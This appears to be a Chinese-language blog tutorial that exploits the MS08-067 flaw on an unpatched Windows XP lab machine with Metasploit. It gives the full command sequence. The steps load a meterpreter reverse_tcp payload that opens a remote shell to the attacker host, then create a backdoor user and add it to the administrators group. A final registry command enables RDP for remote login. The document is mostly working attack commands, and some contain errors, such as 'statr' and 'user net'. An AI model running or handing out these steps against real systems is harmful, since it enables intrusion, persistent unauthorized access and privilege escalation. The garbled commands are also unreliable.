Ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击可以获得一个相对高的权限;
1:准备工作:WINxp sp3 系统(无补丁)
下载地址:
http://blog.csdn.net/sql_injection/article/details/47683419
攻击kali ip:192.168.243.133
靶机 ip :192.168.243.136
2:准备工作完成后开启kali打开终端metasploit中的msfconsole框架
命令 :
msfconsole
打开metasploit之前需要连接上postgresql:
service postgresql statr
3:寻找和加载
Ms08_067模块
(1):使用搜索命令搜索此模块:
search ms08_067_netapi
(2):应用搜索到的模块地址:
use exploit/windows/smb/ms08_067_netapi
4:
我们来加载一枚payload:
set payload windows/meterpreter/reverse_tcp
此时加载完毕可以查看需要设置的参数:
show options
然后如下图所示:
5:上图所示的 RHOST 为靶机的 ip, LHOST为kali 的ip:
set RHOST 被攻击者ip
set LHOST 被攻击者ip
然后进行攻击:
exploit
6:出现meterpreter命令后说明攻击成功,此时输入shell进入靶机cmd界面对其建立新的用户,并且提权:
(1):建立用户:
user net 用户名 密码 /add
(2):提权:
net localgroup administrators wmc /add
7:提权过后就可以进行远程连接登入了,但是此时要查看靶机是否打开了3389端口,因为此端口是用来进行远程连接的:
(1):查看是否打开:
netstat -na
(2):显然并没有,那么我们就给它打开:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
可以看到,3389端口已经打开。
8:接下来就用自己本机系统进行远程连接搞事情就可以了:
(1)打开cmd输入远程连接命令:
(2)此时计算机名输入靶机的ip地址就可以了,之后输入你自己建立的用户名和密码:
(3):就成功进入了:
此时完成所有操作。
总结:
此时靶机上也有了你创建的新用户。
要使用没有补丁的靶机,不然攻击时会失败。